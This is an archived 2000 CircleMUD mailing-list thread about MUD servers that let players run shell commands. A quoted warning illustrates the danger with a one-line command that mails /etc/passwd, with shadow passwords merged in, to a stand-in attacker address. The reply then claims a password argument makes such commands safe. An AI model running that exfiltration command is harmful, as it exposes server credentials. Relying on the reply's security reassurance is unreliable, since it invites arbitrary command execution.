---- Begin Original Message ---- From: The Merciless Lord of Everything <serces@mud.dk> Sent: Fri, 8 Sep 2000 12:25:30 +0200 To: CIRCLE@post.queensu.ca Subject: Re: [CIRCLE] Ports -snip- While I'm on the ranting side :), a mud should imho not be able to grab onto system files. I've seen muds offer "ps -axu" and return the information to the user, even muds that offer the ability to execute arbitrary commands on the server. Imagine the following in conjunciton with a mud that runs as root (and offers the above arbitrary) Mr. Evilguy hacks the admins passwords (grabs it or however Evilguys get it :), and does a "execute pwunconv && mail evilguy@foo.bar < /etc/passwd && pwconv" Voila.. mr evilguy now has a complete listing of usernames and passwords. -snip- /S Sir Alec Guinness - May the force be with you, Always! +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ Hrmm, I beg to differ with you here. I installed pgrun.c written by Petr Vilim and have found it very useful. After contacting Petr, I installed a "make" command that allows me to compile the MUD without having to enter the shell. When you edit the source via save-to-ftp, you find this more than a bit handy. Security is not that hard, as long as you protect each command with a final argument that contains a password. Of course, you want to check the player's idnum first. If a hacker is out to get you, there isn't much you can do. I refuse to stay hudled up in a corner, cowering in fright while life passes me by. -FIRE Get your Free E-mail at http://randor.zzn.com ____________________________________________________________ Get your own Web-Based E-mail Service at http://www.zzn.com +------------------------------------------------------------+ | Ensure that you have read the CircleMUD Mailing List FAQ: | | http://qsilver.queensu.ca/~fletchra/Circle/list-faq.html | +------------------------------------------------------------+
This archive was generated by hypermail 2b30 : 04/11/01 PDT